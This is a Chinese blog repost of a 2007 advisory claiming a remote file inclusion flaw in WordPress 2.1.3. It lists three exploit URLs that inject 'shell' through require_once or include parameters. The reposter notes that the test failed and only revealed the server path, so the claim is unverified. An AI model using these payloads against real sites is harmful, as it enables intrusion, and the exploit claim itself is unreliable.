鬼仔注:前两天看到的,一直考虑要不要放上来,因为我测试没有成功,只是爆出了物理路径(文章末尾附图)。有测试成功的说明下。
来源:SecurityFocus
by : www.hackeraz.ir userz , saeid…
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
Download..: http://wordpress-deutschland.org #
Risk …………..: high #
Date ………: 25/4/2007 #
Found by ……….: s433d_only_linux #
Contact ………..: s433d_only_linux (at) yahoo (dot) de [email concealed] #
Web ………….: Www.hackerz.ir #
special thanx ……….. Ali Jasbi my beste friend#
###############################################
Affected File: #
wordpress/wp-settings.php #
wordpress/wp-includes/template-loader.php #
wordpress/wp-includes/theme.php #
###############################################
Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?
###############################################
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论